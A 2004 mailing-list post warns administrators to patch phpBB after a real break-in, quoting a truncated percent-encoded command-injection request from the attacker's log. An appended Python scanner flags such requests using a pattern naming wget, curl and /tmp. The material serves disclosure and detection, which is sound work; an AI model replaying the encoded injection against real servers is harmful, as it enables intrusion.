Hello debian-isp,

maybe a little off-topic, but I want to remind you of this phpBB vulnerability, which is fixed in version 2.0.11 (announced on 18th November), which "addresses a potentially serious exploit".
I am writing this because it's not potential, but real. Two weeks ago, someone got into my server and ran a program which gave shell access on port 2000 (check your machines). Fortunately it had only apache user privileges, but the person tried to run various exploits. So I was sure the only option to get into my server was php. When I was sure no damage could be done, I left everything and set up 2 traps - one was periodic running of netstat | grep ":2000" and the other was creating a world-writable /.bash_history :)

Today I was lucky: I have the IP address, probably of the attacker (some GSM provider in Romania), and the IP of another "hacked" server. Searching for that IP in the apache logs gave me this:

213.xxx.xxx.xxx - - [11/Dec/2004:04:01:59 +0100] "GET /forum/viewtopic.php?t=%38&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70...... HTTP/1.1" 200 27712 "-" "-"

I don't want to give hints on how to exploit this, but the attacker did wget the .tgz file, unpacked it in /tmp and ran the program. So update all your phpBB installations ASAP (and of course all installations of your customers).

--
bYE, Marki
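
Added example, not part of the original post: a log check for requests like the one quoted above, where a viewtopic.php parameter arrives with ordinary letters percent-escaped and decodes to shell-looking text. The function name, the heuristics and the sample lines (192.0.2.x documentation addresses) are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Access-log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Percent-escapes of unreserved characters (A-Z a-z 0-9 - . _ ~). RFC 3986 says
# these need no encoding, so a normal browser does not send them escaped.
OVERENCODED = re.compile(
    r'%(?:2[DdEe]|3[0-9]|4[1-9A-Fa-f]|5[0-9AaFf]|6[1-9A-Fa-f]|7[0-9AaEe])')
# Shell-looking content after decoding (heuristic list chosen for this example).
SHELL_HINT = re.compile(r';|\||`|\$\(|\b(?:cd|echo|wget|curl)\b|/tmp\b')

def inspect_line(line, script="viewtopic.php", min_overencoded=3):
    """Return a finding dict for a suspicious request to `script`, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, target, status = m.groups()
    path, _, query = target.partition("?")
    if not path.endswith("/" + script) or not query:
        return None
    findings = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        decoded = unquote(raw.replace("+", " "))
        reasons = []
        if len(OVERENCODED.findall(raw)) >= min_overencoded:
            reasons.append("over-encoded")
        if SHELL_HINT.search(decoded):
            reasons.append("shell-like")
        if reasons:
            findings.append((unquote(name), decoded, reasons))
    if not findings:
        return None
    return {"host": host, "time": when, "status": int(status), "findings": findings}

# Constructed sample lines: 192.0.2.x are documentation addresses; the first request
# reuses only the part of the query string that is visible in the post.
SAMPLE = [
    '192.0.2.10 - - [11/Dec/2004:04:01:59 +0100] "GET /forum/viewtopic.php?t=%38'
    '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70'
    ' HTTP/1.1" 200 27712 "-" "-"',
    '192.0.2.20 - - [11/Dec/2004:09:15:02 +0100] "GET /forum/viewtopic.php?t=8'
    '&start=15 HTTP/1.1" 200 31044 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in filter(None, map(inspect_line, SAMPLE)):
        print(hit["host"], hit["time"], hit["status"], hit["findings"])
```

To scan a real log, call inspect_line on each line of the access log file. A hit with status 200 means the server answered the request, so that host deserves the checks described in the post (a listener on port 2000, unexpected files in /tmp).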